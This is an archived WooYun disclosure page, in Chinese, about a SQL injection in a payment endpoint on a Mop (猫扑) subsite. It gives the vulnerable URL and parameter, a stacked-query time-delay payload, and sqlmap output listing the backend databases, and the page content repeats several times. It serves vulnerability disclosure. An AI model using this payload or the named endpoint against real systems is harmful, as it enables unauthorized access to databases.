猫扑某分站存在SQL注入 | wooyun-2015-0152944| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152944

漏洞标题：猫扑某分站存在SQL注入

漏洞作者：头晕脑壳疼

提交时间：2015-11-09 10:44

修复时间：2015-12-24 13:16

公开时间：2015-12-24 13:16

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-09：细节已通知厂商并且等待厂商处理中
2015-11-09：厂商已经确认，细节仅向厂商公开
2015-11-19：细节向核心白帽子及相关领域专家公开
2015-11-29：细节向普通白帽子公开
2015-12-09：细节向实习白帽子公开
2015-12-24：细节向公众公开

简要描述：

详细说明：

已经有人提交过，但是别的修复了，这个没有修复
<img src=" WooYun: 猫扑某站存在SQL注入 " alt="" />

http://yeyou.mop.com/payment/Alipay_Pay.aspx?code=Alipay

Parameter: code (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: code=Alipay';WAITFOR DELAY '0:0:5'--
---
[10:37:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[10:37:33] [INFO] fetching database names
[10:37:33] [INFO] fetching number of databases
[10:37:33] [INFO] resumed: 8
[10:37:33] [INFO] resumed: bbs
[10:37:33] [INFO] resumed: master
[10:37:33] [INFO] resumed: model
[10:37:33] [INFO] resumed: msdb
[10:37:33] [INFO] resumed: ReportServer
[10:37:33] [INFO] resumed: Rem
[10:37:33] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[10:37:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[10:37:58] [INFO] adjusting time delay to 2 seconds due to good response times
tempdb
[10:38:55] [INFO] retrieved: xy003
available databases [8]:
[*] bbs
[*] master
[*] model
[*] msdb
[*] Rem
[*] ReportServer
[*] tempdb
[*] xy003

漏洞证明：

已经有人提交过，但是别的修复了，这个没有修复
<img src=" WooYun: 猫扑某站存在SQL注入 " alt="" />

ttp://yeyou.mop.com/payment/Alipay_Pay.aspx?code=Alipay

Parameter: code (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: code=Alipay';WAITFOR DELAY '0:0:5'--
---
[10:37:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[10:37:33] [INFO] fetching database names
[10:37:33] [INFO] fetching number of databases
[10:37:33] [INFO] resumed: 8
[10:37:33] [INFO] resumed: bbs
[10:37:33] [INFO] resumed: master
[10:37:33] [INFO] resumed: model
[10:37:33] [INFO] resumed: msdb
[10:37:33] [INFO] resumed: ReportServer
[10:37:33] [INFO] resumed: Rem
[10:37:33] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[10:37:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[10:37:58] [INFO] adjusting time delay to 2 seconds due to good response times
tempdb
[10:38:55] [INFO] retrieved: xy003
available databases [8]:
[*] bbs
[*] master
[*] model
[*] msdb
[*] Rem
[*] ReportServer
[*] tempdb
[*] xy003

修复方案：

版权声明：转载请注明来源头晕脑壳疼@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-11-09 13:15

厂商回复：

谢谢，非常感谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152944

漏洞标题：猫扑某分站存在SQL注入

相关厂商：猫扑

漏洞作者：头晕脑壳疼

提交时间：2015-11-09 10:44

修复时间：2015-12-24 13:16

公开时间：2015-12-24 13:16

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源头晕脑壳疼@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152944

漏洞标题：猫扑某分站存在SQL注入

相关厂商：猫扑

漏洞作者： 头晕脑壳疼

提交时间：2015-11-09 10:44

修复时间：2015-12-24 13:16

公开时间：2015-12-24 13:16

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0152944"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 头晕脑壳疼@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：头晕脑壳疼

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源头晕脑壳疼@乌云